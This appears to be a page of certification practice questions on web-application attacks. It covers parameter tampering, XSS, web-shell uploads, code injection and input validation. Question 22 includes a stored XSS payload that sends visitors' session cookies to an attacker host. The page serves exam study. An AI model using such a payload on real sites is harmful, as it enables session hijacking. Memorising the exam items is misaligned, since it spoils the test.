
CertNexusCyberSec First Responder (CFR)
Domain 1Objective 4
Objective 1.4 Exploit Web-Application Vulnerabilities. CYBERSEC-FIRST-RESPONDER Practice Questions (Page 5)
Part of the 1.0 Attack Computing Environments to Test Cybersecurity domain, which accounts for 52% of the CYBERSEC-FIRST-RESPONDER exam.
35questions here
7free pages
14concepts
52%of the exam
Questions 21–25
- 21
A penetration tester is using a web proxy to intercept traffic to a web application. The tester notices that the application includes a hidden field named 'role' with the value 'user'. The tester changes the value to 'admin' and forwards the request. The application grants administrative privileges. Which vulnerability is being exploited?
Select an answer first - 22
A forum application allows users to post comments. A tester posts a comment containing <script>document.location='http://attacker.com/steal?cookie='+document.cookie</script>. When other users view the comment, their session cookies are sent to the attacker's server. Which vulnerability is being exploited?
Select an answer first - 23
Which attack involves uploading a malicious file, such as a web shell, to a server and then executing it to gain control?
Select an answer first - 24
Which attack involves injecting arbitrary code, such as JavaScript or OS commands, into a web application to achieve code execution?
Select an answer first - 25
Which vulnerability arises when an application does not properly validate or sanitize user input, allowing attackers to inject malicious data or unexpected input types?
Select an answer first
Finished these 5 questions?
Review the revealed explanations, or continue through the curriculum.
Free Basic Practice is a study aid with revealable answers — not a scored exam. Examers.io is independent and not affiliated with or endorsed by CertNexus. “CYBERSEC-FIRST-RESPONDER” is a trademark of its owner, used for identification only.